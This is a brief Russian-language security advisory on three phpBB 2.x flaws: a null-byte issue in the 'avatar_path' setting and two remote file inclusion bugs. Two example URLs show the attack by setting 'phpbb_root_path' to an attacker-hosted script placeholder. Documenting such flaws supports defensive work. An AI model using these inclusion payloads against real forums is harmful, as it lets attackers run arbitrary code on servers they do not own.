Программа: phpBB 2.x

Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе.

1) Уязвимость существует из-за недостаточной обработки входных данных в параметре "avatar_path" сценарием admin/admin_board.php перед использованием в качестве конфигурационной переменной для сохранения картинок. Злоумышленник может задать в параметре "avatar_path" файл с нулевым байтов в конце, что позволит выполнить произвольный сценарий на уязвимой системе.

2) Уязвимость существует из-за недостаточной обработки входных данных в параметре " phpbb_root_path " сценарием functions_static_topics.php.

Пример:

http://www.site.com/[path]/includes/functions_static_topics.php? phpbb_root_path=[Evil_Script]

3) Уязвимость существует из-за недостаточной обработки входных данных в параметре " setmodules" сценарием admin_topic_action_logging.php.

Пример:

http://site.com/[path]/admin/admin_topic_action_logging.php? setmodules=pagestart&phpbb_root_path=http://[Evil_script]

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии